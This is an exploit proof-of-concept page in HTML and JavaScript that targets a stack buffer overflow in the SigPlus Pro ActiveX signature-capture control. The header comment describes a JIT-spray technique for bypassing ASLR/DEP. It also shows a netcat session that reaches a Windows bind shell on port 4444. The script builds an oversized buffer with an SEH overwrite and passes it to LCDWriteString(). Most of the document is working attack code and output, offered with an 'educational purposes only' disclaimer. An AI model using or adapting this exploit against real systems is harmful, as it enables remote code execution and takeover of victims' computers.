<html>
<!--
===================================================================================================
SigPlus Pro v3.74 ActiveX Signature Capture LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass
Author: mr_me - @StevenSeeley
Download: http://www.topazsystems.com/Software/download/sigplusactivex.htm
Tested on: Windows 7 Professional vN (IE8)
Windows XP Professional SP3 (IE7/8)
Greetz: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
*** Special thanks to Alex Sintsov from DSecRG ***
===================================================================================================
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
===================================================================================================
Things to note:
- Latest version of SigPlus pro is not Vulnerable.
- Attached below is the base64 of jit-spray.swf.
- the victim will need flash <= v10.0.42.
- The shell code executes bindshell on port 4444.
How is it working?
Spraying the JIT memory pages with nops + egghunter combined with a call to VirtualProtect() to mark
our newly found shellcode to executable and then jumping to it. We spray so many pages that the retn
address we guess and the exploit becomes reliable working 9/10 times.
root@bt:~# nc -v 192.168.1.8 4444
192.168.1.8: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.8] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Steve\Desktop>
===================================================================================================
-->
function rockAndRoll()
{
var buffSize = 477;
var x = unescape("%41");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
// you may need to change this value
var seh = unescape("%01%01%22%0d");
var y = unescape("%42");
var buffSize1 = 5140;
while (y.length<buffSize1) y += y;
y = y.substring(0,buffSize1);
alert('Do you feel lucky, punk?')
target.LCDWriteString(1,1,1,1,1,1,1,x+seh+y);
}